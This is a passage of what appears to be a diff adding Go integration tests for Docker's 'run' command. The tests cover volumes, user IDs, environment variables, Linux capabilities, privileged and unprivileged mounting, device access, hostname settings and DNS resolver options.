dockerCmd(c, "run", "--volumes-from", "parent1", "--volumes-from", "parent2", "busybox", "sh", "-c", "cat /test/foo && cat /other/bar") +} + +// this tests verifies the ID format for the container +func (s *DockerSuite) TestRunVerifyContainerID(c *check.C) { + out, exit, err := dockerCmdWithError("run", "-d", "busybox", "true") + if err != nil { + c.Fatal(err) + } + if exit != 0 { + c.Fatalf("expected exit code 0 received %d", exit) + } + + match, err := regexp.MatchString("^[0-9a-f]{64}$", strings.TrimSuffix(out, "\n")) + if err != nil { + c.Fatal(err) + } + if !match { + c.Fatalf("Invalid container ID: %s", out) + } +} + +// Test that creating a container with a volume doesn't crash. Regression test for #995. +func (s *DockerSuite) TestRunCreateVolume(c *check.C) { + prefix := "" + if daemonPlatform == "windows" { + prefix = `c:` + } + dockerCmd(c, "run", "-v", prefix+"/var/lib/data", "busybox", "true") +} + +// Test that creating a volume with a symlink in its path works correctly. Test for #5152. +// Note that this bug happens only with symlinks with a target that starts with '/'. +func (s *DockerSuite) TestRunCreateVolumeWithSymlink(c *check.C) { + // Cannot run on Windows as relies on Linux-specific functionality (sh -c mount...) 
+ testRequires(c, DaemonIsLinux) + image := "docker-test-createvolumewithsymlink" + + buildCmd := exec.Command(dockerBinary, "build", "-t", image, "-") + buildCmd.Stdin = strings.NewReader(`FROM busybox + RUN ln -s home /bar`) + buildCmd.Dir = workingDirectory + err := buildCmd.Run() + if err != nil { + c.Fatalf("could not build '%s': %v", image, err) + } + + _, exitCode, err := dockerCmdWithError("run", "-v", "/bar/foo", "--name", "test-createvolumewithsymlink", image, "sh", "-c", "mount | grep -q /home/foo") + if err != nil || exitCode != 0 { + c.Fatalf("[run] err: %v, exitcode: %d", err, exitCode) + } + + volPath, err := inspectMountSourceField("test-createvolumewithsymlink", "/bar/foo") + c.Assert(err, checker.IsNil) + + _, exitCode, err = dockerCmdWithError("rm", "-v", "test-createvolumewithsymlink") + if err != nil || exitCode != 0 { + c.Fatalf("[rm] err: %v, exitcode: %d", err, exitCode) + } + + _, err = os.Stat(volPath) + if !os.IsNotExist(err) { + c.Fatalf("[open] (expecting 'file does not exist' error) err: %v, volPath: %s", err, volPath) + } +} + +// Tests that a volume path that has a symlink exists in a container mounting it with `--volumes-from`. 
+func (s *DockerSuite) TestRunVolumesFromSymlinkPath(c *check.C) { + // TODO Windows (Post TP5): This test cannot run on a Windows daemon as + // Windows does not support symlinks inside a volume path + testRequires(c, DaemonIsLinux) + name := "docker-test-volumesfromsymlinkpath" + prefix := "" + dfContents := `FROM busybox + RUN ln -s home /foo + VOLUME ["/foo/bar"]` + + if daemonPlatform == "windows" { + prefix = `c:` + dfContents = `FROM ` + WindowsBaseImage + ` + RUN mkdir c:\home + RUN mklink /D c:\foo c:\home + VOLUME ["c:/foo/bar"] + ENTRYPOINT c:\windows\system32\cmd.exe` + } + + buildCmd := exec.Command(dockerBinary, "build", "-t", name, "-") + buildCmd.Stdin = strings.NewReader(dfContents) + buildCmd.Dir = workingDirectory + err := buildCmd.Run() + if err != nil { + c.Fatalf("could not build 'docker-test-volumesfromsymlinkpath': %v", err) + } + + out, exitCode, err := dockerCmdWithError("run", "--name", "test-volumesfromsymlinkpath", name) + if err != nil || exitCode != 0 { + c.Fatalf("[run] (volume) err: %v, exitcode: %d, out: %s", err, exitCode, out) + } + + _, exitCode, err = dockerCmdWithError("run", "--volumes-from", "test-volumesfromsymlinkpath", "busybox", "sh", "-c", "ls "+prefix+"/foo | grep -q bar") + if err != nil || exitCode != 0 { + c.Fatalf("[run] err: %v, exitcode: %d", err, exitCode) + } +} + +func (s *DockerSuite) TestRunExitCode(c *check.C) { + var ( + exit int + err error + ) + + _, exit, err = dockerCmdWithError("run", "busybox", "/bin/sh", "-c", "exit 72") + + if err == nil { + c.Fatal("should not have a non nil error") + } + if exit != 72 { + c.Fatalf("expected exit code 72 received %d", exit) + } +} + +func (s *DockerSuite) TestRunUserDefaults(c *check.C) { + expected := "uid=0(root) gid=0(root)" + if daemonPlatform == "windows" { + expected = "uid=1000(ContainerAdministrator) gid=1000(ContainerAdministrator)" + } + out, _ := dockerCmd(c, "run", "busybox", "id") + if !strings.Contains(out, expected) { + c.Fatalf("expected '%s' got 
%s", expected, out) + } +} + +func (s *DockerSuite) TestRunUserByName(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as Windows does + // not support the use of -u + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-u", "root", "busybox", "id") + if !strings.Contains(out, "uid=0(root) gid=0(root)") { + c.Fatalf("expected root user got %s", out) + } +} + +func (s *DockerSuite) TestRunUserByID(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as Windows does + // not support the use of -u + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-u", "1", "busybox", "id") + if !strings.Contains(out, "uid=1(daemon) gid=1(daemon)") { + c.Fatalf("expected daemon user got %s", out) + } +} + +func (s *DockerSuite) TestRunUserByIDBig(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as Windows does + // not support the use of -u + testRequires(c, DaemonIsLinux, NotArm) + out, _, err := dockerCmdWithError("run", "-u", "2147483648", "busybox", "id") + if err == nil { + c.Fatal("No error, but must be.", out) + } + if !strings.Contains(strings.ToUpper(out), strings.ToUpper(libcontainerUser.ErrRange.Error())) { + c.Fatalf("expected error about uids range, got %s", out) + } +} + +func (s *DockerSuite) TestRunUserByIDNegative(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as Windows does + // not support the use of -u + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "-u", "-1", "busybox", "id") + if err == nil { + c.Fatal("No error, but must be.", out) + } + if !strings.Contains(strings.ToUpper(out), strings.ToUpper(libcontainerUser.ErrRange.Error())) { + c.Fatalf("expected error about uids range, got %s", out) + } +} + +func (s *DockerSuite) TestRunUserByIDZero(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as Windows does + // not support the use of -u + testRequires(c, DaemonIsLinux) + out, _, err := 
dockerCmdWithError("run", "-u", "0", "busybox", "id") + if err != nil { + c.Fatal(err, out) + } + if !strings.Contains(out, "uid=0(root) gid=0(root) groups=10(wheel)") { + c.Fatalf("expected daemon user got %s", out) + } +} + +func (s *DockerSuite) TestRunUserNotFound(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as Windows does + // not support the use of -u + testRequires(c, DaemonIsLinux) + _, _, err := dockerCmdWithError("run", "-u", "notme", "busybox", "id") + if err == nil { + c.Fatal("unknown user should cause container to fail") + } +} + +func (s *DockerSuite) TestRunTwoConcurrentContainers(c *check.C) { + sleepTime := "2" + group := sync.WaitGroup{} + group.Add(2) + + errChan := make(chan error, 2) + for i := 0; i < 2; i++ { + go func() { + defer group.Done() + _, _, err := dockerCmdWithError("run", "busybox", "sleep", sleepTime) + errChan <- err + }() + } + + group.Wait() + close(errChan) + + for err := range errChan { + c.Assert(err, check.IsNil) + } +} + +func (s *DockerSuite) TestRunEnvironment(c *check.C) { + // TODO Windows: Environment handling is different between Linux and + // Windows and this test relies currently on unix functionality. 
+ testRequires(c, DaemonIsLinux) + cmd := exec.Command(dockerBinary, "run", "-h", "testing", "-e=FALSE=true", "-e=TRUE", "-e=TRICKY", "-e=HOME=", "busybox", "env") + cmd.Env = append(os.Environ(), + "TRUE=false", + "TRICKY=tri\ncky\n", + ) + + out, _, err := runCommandWithOutput(cmd) + if err != nil { + c.Fatal(err, out) + } + + actualEnv := strings.Split(strings.TrimSpace(out), "\n") + sort.Strings(actualEnv) + + goodEnv := []string{ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "HOSTNAME=testing", + "FALSE=true", + "TRUE=false", + "TRICKY=tri", + "cky", + "", + "HOME=/root", + } + sort.Strings(goodEnv) + if len(goodEnv) != len(actualEnv) { + c.Fatalf("Wrong environment: should be %d variables, not %d: %q", len(goodEnv), len(actualEnv), strings.Join(actualEnv, ", ")) + } + for i := range goodEnv { + if actualEnv[i] != goodEnv[i] { + c.Fatalf("Wrong environment variable: should be %s, not %s", goodEnv[i], actualEnv[i]) + } + } +} + +func (s *DockerSuite) TestRunEnvironmentErase(c *check.C) { + // TODO Windows: Environment handling is different between Linux and + // Windows and this test relies currently on unix functionality. 
+ testRequires(c, DaemonIsLinux) + + // Test to make sure that when we use -e on env vars that are + // not set in our local env that they're removed (if present) in + // the container + + cmd := exec.Command(dockerBinary, "run", "-e", "FOO", "-e", "HOSTNAME", "busybox", "env") + cmd.Env = appendBaseEnv(true) + + out, _, err := runCommandWithOutput(cmd) + if err != nil { + c.Fatal(err, out) + } + + actualEnv := strings.Split(strings.TrimSpace(out), "\n") + sort.Strings(actualEnv) + + goodEnv := []string{ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "HOME=/root", + } + sort.Strings(goodEnv) + if len(goodEnv) != len(actualEnv) { + c.Fatalf("Wrong environment: should be %d variables, not %d: %q", len(goodEnv), len(actualEnv), strings.Join(actualEnv, ", ")) + } + for i := range goodEnv { + if actualEnv[i] != goodEnv[i] { + c.Fatalf("Wrong environment variable: should be %s, not %s", goodEnv[i], actualEnv[i]) + } + } +} + +func (s *DockerSuite) TestRunEnvironmentOverride(c *check.C) { + // TODO Windows: Environment handling is different between Linux and + // Windows and this test relies currently on unix functionality. 
+ testRequires(c, DaemonIsLinux) + + // Test to make sure that when we use -e on env vars that are + // already in the env that we're overriding them + + cmd := exec.Command(dockerBinary, "run", "-e", "HOSTNAME", "-e", "HOME=/root2", "busybox", "env") + cmd.Env = appendBaseEnv(true, "HOSTNAME=bar") + + out, _, err := runCommandWithOutput(cmd) + if err != nil { + c.Fatal(err, out) + } + + actualEnv := strings.Split(strings.TrimSpace(out), "\n") + sort.Strings(actualEnv) + + goodEnv := []string{ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "HOME=/root2", + "HOSTNAME=bar", + } + sort.Strings(goodEnv) + if len(goodEnv) != len(actualEnv) { + c.Fatalf("Wrong environment: should be %d variables, not %d: %q", len(goodEnv), len(actualEnv), strings.Join(actualEnv, ", ")) + } + for i := range goodEnv { + if actualEnv[i] != goodEnv[i] { + c.Fatalf("Wrong environment variable: should be %s, not %s", goodEnv[i], actualEnv[i]) + } + } +} + +func (s *DockerSuite) TestRunContainerNetwork(c *check.C) { + if daemonPlatform == "windows" { + // Windows busybox does not have ping. Use built in ping instead. + dockerCmd(c, "run", WindowsBaseImage, "ping", "-n", "1", "127.0.0.1") + } else { + dockerCmd(c, "run", "busybox", "ping", "-c", "1", "127.0.0.1") + } +} + +func (s *DockerSuite) TestRunNetHostNotAllowedWithLinks(c *check.C) { + // TODO Windows: This is Linux specific as --link is not supported and + // this will be deprecated in favor of container networking model. 
+ testRequires(c, DaemonIsLinux, NotUserNamespace) + dockerCmd(c, "run", "--name", "linked", "busybox", "true") + + _, _, err := dockerCmdWithError("run", "--net=host", "--link", "linked:linked", "busybox", "true") + if err == nil { + c.Fatal("Expected error") + } +} + +// #7851 hostname outside container shows FQDN, inside only shortname +// For testing purposes it is not required to set host's hostname directly +// and use "--net=host" (as the original issue submitter did), as the same +// codepath is executed with "docker run -h <hostname>". Both were manually +// tested, but this testcase takes the simpler path of using "run -h .." +func (s *DockerSuite) TestRunFullHostnameSet(c *check.C) { + // TODO Windows: -h is not yet functional. + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-h", "foo.bar.baz", "busybox", "hostname") + if actual := strings.Trim(out, "\r\n"); actual != "foo.bar.baz" { + c.Fatalf("expected hostname 'foo.bar.baz', received %s", actual) + } +} + +func (s *DockerSuite) TestRunPrivilegedCanMknod(c *check.C) { + // Not applicable for Windows as Windows daemon does not support + // the concept of --privileged, and mknod is a Unix concept. + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "--privileged", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok") + if actual := strings.Trim(out, "\r\n"); actual != "ok" { + c.Fatalf("expected output ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunUnprivilegedCanMknod(c *check.C) { + // Not applicable for Windows as Windows daemon does not support + // the concept of --privileged, and mknod is a Unix concept. 
+ testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok") + if actual := strings.Trim(out, "\r\n"); actual != "ok" { + c.Fatalf("expected output ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunCapDropInvalid(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-drop + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--cap-drop=CHPASS", "busybox", "ls") + if err == nil { + c.Fatal(err, out) + } +} + +func (s *DockerSuite) TestRunCapDropCannotMknod(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-drop or mknod + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--cap-drop=MKNOD", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok") + + if err == nil { + c.Fatal(err, out) + } + if actual := strings.Trim(out, "\r\n"); actual == "ok" { + c.Fatalf("expected output not ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunCapDropCannotMknodLowerCase(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-drop or mknod + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--cap-drop=mknod", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok") + + if err == nil { + c.Fatal(err, out) + } + if actual := strings.Trim(out, "\r\n"); actual == "ok" { + c.Fatalf("expected output not ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunCapDropALLCannotMknod(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-drop or mknod + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--cap-drop=ALL", "--cap-add=SETGID", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok") + if err == nil { + c.Fatal(err, out) + } + if actual := strings.Trim(out, "\r\n"); actual == "ok" { + c.Fatalf("expected output not ok received %s", actual) + } +} + +func (s *DockerSuite) 
TestRunCapDropALLAddMknodCanMknod(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-drop or mknod + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "--cap-drop=ALL", "--cap-add=MKNOD", "--cap-add=SETGID", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok") + + if actual := strings.Trim(out, "\r\n"); actual != "ok" { + c.Fatalf("expected output ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunCapAddInvalid(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-add + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--cap-add=CHPASS", "busybox", "ls") + if err == nil { + c.Fatal(err, out) + } +} + +func (s *DockerSuite) TestRunCapAddCanDownInterface(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-add + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "--cap-add=NET_ADMIN", "busybox", "sh", "-c", "ip link set eth0 down && echo ok") + + if actual := strings.Trim(out, "\r\n"); actual != "ok" { + c.Fatalf("expected output ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunCapAddALLCanDownInterface(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-add + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "--cap-add=ALL", "busybox", "sh", "-c", "ip link set eth0 down && echo ok") + + if actual := strings.Trim(out, "\r\n"); actual != "ok" { + c.Fatalf("expected output ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunCapAddALLDropNetAdminCanDownInterface(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-add + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--cap-add=ALL", "--cap-drop=NET_ADMIN", "busybox", "sh", "-c", "ip link set eth0 down && echo ok") + if err == nil { + c.Fatal(err, out) + } + if actual := strings.Trim(out, "\r\n"); actual == "ok" { + c.Fatalf("expected output not 
ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunGroupAdd(c *check.C) { + // Not applicable for Windows as there is no concept of --group-add + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "--group-add=audio", "--group-add=staff", "--group-add=777", "busybox", "sh", "-c", "id") + + groupsList := "uid=0(root) gid=0(root) groups=10(wheel),29(audio),50(staff),777" + if actual := strings.Trim(out, "\r\n"); actual != groupsList { + c.Fatalf("expected output %s received %s", groupsList, actual) + } +} + +func (s *DockerSuite) TestRunPrivilegedCanMount(c *check.C) { + // Not applicable for Windows as there is no concept of --privileged + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "--privileged", "busybox", "sh", "-c", "mount -t tmpfs none /tmp && echo ok") + + if actual := strings.Trim(out, "\r\n"); actual != "ok" { + c.Fatalf("expected output ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunUnprivilegedCannotMount(c *check.C) { + // Not applicable for Windows as there is no concept of unprivileged + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "busybox", "sh", "-c", "mount -t tmpfs none /tmp && echo ok") + + if err == nil { + c.Fatal(err, out) + } + if actual := strings.Trim(out, "\r\n"); actual == "ok" { + c.Fatalf("expected output not ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunSysNotWritableInNonPrivilegedContainers(c *check.C) { + // Not applicable for Windows as there is no concept of unprivileged + testRequires(c, DaemonIsLinux, NotArm) + if _, code, err := dockerCmdWithError("run", "busybox", "touch", "/sys/kernel/profiling"); err == nil || code == 0 { + c.Fatal("sys should not be writable in a non privileged container") + } +} + +func (s *DockerSuite) TestRunSysWritableInPrivilegedContainers(c *check.C) { + // Not applicable for Windows as there is no concept of unprivileged + testRequires(c, DaemonIsLinux, NotUserNamespace, 
NotArm) + if _, code, err := dockerCmdWithError("run", "--privileged", "busybox", "touch", "/sys/kernel/profiling"); err != nil || code != 0 { + c.Fatalf("sys should be writable in privileged container") + } +} + +func (s *DockerSuite) TestRunProcNotWritableInNonPrivilegedContainers(c *check.C) { + // Not applicable for Windows as there is no concept of unprivileged + testRequires(c, DaemonIsLinux) + if _, code, err := dockerCmdWithError("run", "busybox", "touch", "/proc/sysrq-trigger"); err == nil || code == 0 { + c.Fatal("proc should not be writable in a non privileged container") + } +} + +func (s *DockerSuite) TestRunProcWritableInPrivilegedContainers(c *check.C) { + // Not applicable for Windows as there is no concept of --privileged + testRequires(c, DaemonIsLinux, NotUserNamespace) + if _, code := dockerCmd(c, "run", "--privileged", "busybox", "sh", "-c", "touch /proc/sysrq-trigger"); code != 0 { + c.Fatalf("proc should be writable in privileged container") + } +} + +func (s *DockerSuite) TestRunDeviceNumbers(c *check.C) { + // Not applicable on Windows as /dev/ is a Unix specific concept + // TODO: NotUserNamespace could be removed here if "root" "root" is replaced w user + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "busybox", "sh", "-c", "ls -l /dev/null") + deviceLineFields := strings.Fields(out) + deviceLineFields[6] = "" + deviceLineFields[7] = "" + deviceLineFields[8] = "" + expected := []string{"crw-rw-rw-", "1", "root", "root", "1,", "3", "", "", "", "/dev/null"} + + if !(reflect.DeepEqual(deviceLineFields, expected)) { + c.Fatalf("expected output\ncrw-rw-rw- 1 root root 1, 3 May 24 13:29 /dev/null\n received\n %s\n", out) + } +} + +func (s *DockerSuite) TestRunThatCharacterDevicesActLikeCharacterDevices(c *check.C) { + // Not applicable on Windows as /dev/ is a Unix specific concept + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "busybox", "sh", "-c", "dd if=/dev/zero of=/zero bs=1k count=5 2> 
/dev/null ; du -h /zero") + if actual := strings.Trim(out, "\r\n"); actual[0] == '0' { + c.Fatalf("expected a new file called /zero to be create that is greater than 0 bytes long, but du says: %s", actual) + } +} + +func (s *DockerSuite) TestRunUnprivilegedWithChroot(c *check.C) { + // Not applicable on Windows as it does not support chroot + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "busybox", "chroot", "/", "true") +} + +func (s *DockerSuite) TestRunAddingOptionalDevices(c *check.C) { + // Not applicable on Windows as Windows does not support --device + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "--device", "/dev/zero:/dev/nulo", "busybox", "sh", "-c", "ls /dev/nulo") + if actual := strings.Trim(out, "\r\n"); actual != "/dev/nulo" { + c.Fatalf("expected output /dev/nulo, received %s", actual) + } +} + +func (s *DockerSuite) TestRunAddingOptionalDevicesNoSrc(c *check.C) { + // Not applicable on Windows as Windows does not support --device + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "--device", "/dev/zero:rw", "busybox", "sh", "-c", "ls /dev/zero") + if actual := strings.Trim(out, "\r\n"); actual != "/dev/zero" { + c.Fatalf("expected output /dev/zero, received %s", actual) + } +} + +func (s *DockerSuite) TestRunAddingOptionalDevicesInvalidMode(c *check.C) { + // Not applicable on Windows as Windows does not support --device + testRequires(c, DaemonIsLinux, NotUserNamespace) + _, _, err := dockerCmdWithError("run", "--device", "/dev/zero:ro", "busybox", "sh", "-c", "ls /dev/zero") + if err == nil { + c.Fatalf("run container with device mode ro should fail") + } +} + +func (s *DockerSuite) TestRunModeHostname(c *check.C) { + // Not applicable on Windows as Windows does not support -h + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + out, _ := dockerCmd(c, "run", "-h=testhostname", "busybox", "cat", "/etc/hostname") + + if actual := strings.Trim(out, "\r\n"); 
actual != "testhostname" { + c.Fatalf("expected 'testhostname', but says: %q", actual) + } + + out, _ = dockerCmd(c, "run", "--net=host", "busybox", "cat", "/etc/hostname") + + hostname, err := os.Hostname() + if err != nil { + c.Fatal(err) + } + if actual := strings.Trim(out, "\r\n"); actual != hostname { + c.Fatalf("expected %q, but says: %q", hostname, actual) + } +} + +func (s *DockerSuite) TestRunRootWorkdir(c *check.C) { + out, _ := dockerCmd(c, "run", "--workdir", "/", "busybox", "pwd") + expected := "/\n" + if daemonPlatform == "windows" { + expected = "C:" + expected + } + if out != expected { + c.Fatalf("pwd returned %q (expected %s)", out, expected) + } +} + +func (s *DockerSuite) TestRunAllowBindMountingRoot(c *check.C) { + if daemonPlatform == "windows" { + // Windows busybox will fail with Permission Denied on items such as pagefile.sys + dockerCmd(c, "run", "-v", `c:\:c:\host`, WindowsBaseImage, "cmd", "-c", "dir", `c:\host`) + } else { + dockerCmd(c, "run", "-v", "/:/host", "busybox", "ls", "/host") + } +} + +func (s *DockerSuite) TestRunDisallowBindMountingRootToRoot(c *check.C) { + mount := "/:/" + targetDir := "/host" + if daemonPlatform == "windows" { + mount = `c:\:c\` + targetDir = "c:/host" // Forward slash as using busybox + } + out, _, err := dockerCmdWithError("run", "-v", mount, "busybox", "ls", targetDir) + if err == nil { + c.Fatal(out, err) + } +} + +// Verify that a container gets default DNS when only localhost resolvers exist +func (s *DockerSuite) TestRunDNSDefaultOptions(c *check.C) { + // Not applicable on Windows as this is testing Unix specific functionality + testRequires(c, SameHostDaemon, DaemonIsLinux) + + // preserve original resolv.conf for restoring after test + origResolvConf, err := ioutil.ReadFile("/etc/resolv.conf") + if os.IsNotExist(err) { + c.Fatalf("/etc/resolv.conf does not exist") + } + // defer restored original conf + defer func() { + if err := ioutil.WriteFile("/etc/resolv.conf", origResolvConf, 0644); err != 
nil { + c.Fatal(err) + } + }() + + // test 3 cases: standard IPv4 localhost, commented out localhost, and IPv6 localhost + // 2 are removed from the file at container start, and the 3rd (commented out) one is ignored by + // GetNameservers(), leading to a replacement of nameservers with the default set + tmpResolvConf := []byte("nameserver 127.0.0.1\n#nameserver 127.0.2.1\nnameserver ::1") + if err := ioutil.WriteFile("/etc/resolv.conf", tmpResolvConf, 0644); err != nil { + c.Fatal(err) + } + + actual, _ := dockerCmd(c, "run", "busybox", "cat", "/etc/resolv.conf") + // check that the actual defaults are appended to the commented out + // localhost resolver (which should be preserved) + // NOTE: if we ever change the defaults from google dns, this will break + expected := "#nameserver 127.0.2.1\n\nnameserver 8.8.8.8\nnameserver 8.8.4.4\n" + if actual != expected { + c.Fatalf("expected resolv.conf be: %q, but was: %q", expected, actual) + } +} + +func (s *DockerSuite) TestRunDNSOptions(c *check.C) { + // Not applicable on Windows as Windows does not support --dns*, or + // the Unix-specific functionality of resolv.conf. 
+ testRequires(c, DaemonIsLinux) + out, stderr, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--dns-search=mydomain", "--dns-opt=ndots:9", "busybox", "cat", "/etc/resolv.conf") + + // The client will get a warning on stderr when setting DNS to a localhost address; verify this: + if !strings.Contains(stderr, "Localhost DNS setting") { + c.Fatalf("Expected warning on stderr about localhost resolver, but got %q", stderr) + } + + actual := strings.Replace(strings.Trim(out, "\r\n"), "\n", " ", -1) + if actual != "search mydomain nameserver 127.0.0.1 options ndots:9" { + c.Fatalf("expected 'search mydomain nameserver 127.0.0.1 options ndots:9', but says: %q", actual) + } + + out, stderr, _ = dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--dns-search=.", "--dns-opt=ndots:3", "busybox", "cat", "/etc/resolv.conf") + + actual = strings.Replace(strings.Trim(strings.Trim(out, "\r\n"), " "), "\n", " ", -1) + if actual != "nameserver 127.0.0.1 options ndots:3" { + c.Fatalf("expected 'nameserver 127.0.0.1 options ndots:3', but says: %q", actual) + } +} + +func (s *DockerSuite) TestRunDNSRepeatOptions(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=1.1.1.1", "--dns=2.2.2.2", "--dns-search=mydomain", "--dns-search=mydomain2", "--dns-opt=ndots:9", "--dns-opt=timeout:3", "busybox", "cat", "/etc/resolv.conf") + + actual := strings.Replace(strings.Trim(out, "\r\n"), "\n", " ", -1) + if actual != "search mydomain mydomain2 nameserver 1.1.1.1 nameserver 2.2.2.2 options ndots:9 timeout:3" { + c.Fatalf("expected 'search mydomain mydomain2 nameserver 1.1.1.1 nameserver 2.2.2.2 options ndots:9 timeout:3', but says: %q", actual) + } +} + +func (s *DockerSuite) TestRunDNSOptionsBasedOnHostResolvConf(c *check.C) { + // Not applicable on Windows as testing Unix specific functionality + testRequires(c, SameHostDaemon, DaemonIsLinux) + + origResolvConf, err := ioutil.ReadFile("/etc/resolv.conf") + if 
os.IsNotExist(err) { + c.Fatalf("/etc/resolv.conf does not exist") + } + + hostNameservers := resolvconf.GetNameservers(origResolvConf, types.IP) + hostSearch := resolvconf.GetSearchDomains(origResolvConf) + + var out string + out, _ = dockerCmd(c, "run", "--dns=127.0.0.1", "busybox", "cat", "/etc/resolv.conf") + + if actualNameservers := resolvconf.GetNameservers([]byte(out), types.IP); string(actualNameservers[0]) != "127.0.0.1" { + c.Fatalf("expected '127.0.0.1', but says: %q", string(actualNameservers[0])) + } + + actualSearch := resolvconf.GetSearchDomains([]byte(out)) + if len(actualSearch) != len(hostSearch) { + c.Fatalf("expected %q search domain(s), but it has: %q", len(hostSearch), len(actualSearch)) + } + for i := range actualSearch { + if actualSearch[i] != hostSearch[i] { + c.Fatalf("expected %q domain, but says: %q", actualSearch[i], hostSearch[i]) + } + } + + out, _ = dockerCmd(c, "run", "--dns-search=mydomain", "busybox", "cat", "/etc/resolv.conf") + + actualNameservers := resolvconf.GetNameservers([]byte(out), types.IP) + if len(actualNameservers) != len(hostNameservers) { + c.Fatalf("expected %q nameserver(s), but it has: %q", len(hostNameservers), len(actualNameservers)) + } + for i := range actualNameservers { + if actualNameservers[i] != hostNameservers[i] { + c.Fatalf("expected %q nameserver, but says: %q", actualNameservers[i], hostNameservers[i]) + } + } + + if actualSearch = resolvconf.GetSearchDomains([]byte(out)); string(actualSearch[0]) != "mydomain" { + c.Fatalf("expected 'mydomain', but says: %q", string(actualSearch[0])) + } + + // test with file + tmpResolvConf := []byte("search example.com\nnameserver 12.34.56.78\nnameserver 127.0.0.1") + if err := ioutil.WriteFile("/etc/resolv.conf", tmpResolvConf, 0644); err != nil { + c.Fatal(err) + } + // put the old resolvconf back + defer func() { + if err := ioutil.WriteFile("/etc/resolv.conf", origResolvConf, 0644); err != nil { + c.Fatal(err) + } + }() + + resolvConf, err := 
ioutil.ReadFile("/etc/resolv.conf") + if os.IsNotExist(err) { + c.Fatalf("/etc/resolv.conf does not exist") + } + + hostNameservers = resolvconf.GetNameservers(resolvConf, types.IP) + hostSearch = resolvconf.GetSearchDomains(resolvConf) + + out, _ = dockerCmd(c, "run", "busybox", "cat", "/etc/resolv.conf") + if actualNameservers = resolvconf.GetNameservers([]byte(out), types.IP); string(actualNameservers[0]) != "12.34.56.78" || len(actualNameservers) != 1 { + c.Fatalf("expected '12.34.56.78', but has: %v", actualNameservers) + } + + actualSearch = resolvconf.GetSearchDomains([]byte(out)) + if len(actualSearch) != len(hostSearch) { + c.Fatalf("expected %q search domain(s), but it has: %q", len(hostSearch), len(actualSearch)) + } + for i := range actualSearch { + if actualSearch[i] != hostSearch[i] { + c.Fatalf("expected %q domain, but says: %q", actualSearch[i], hostSearch[i]) + } + } +} + +// Test to see if a non-root user can resolve a DNS name. Also +// check if the container resolv.conf file has at least 0644 perm. +func (s *DockerSuite) TestRunNonRootUserResolvName(c *check.C) { + // Not applicable on Windows as Windows does not support --user + testRequires(c, SameHostDaemon, Network, DaemonIsLinux, NotArm) + + dockerCmd(c, "run", "--name=testperm", "--user=nobody", "busybox", "nslookup", "apt.dockerproject.org") + + cID, err := getIDByName("testperm") + if err != nil { 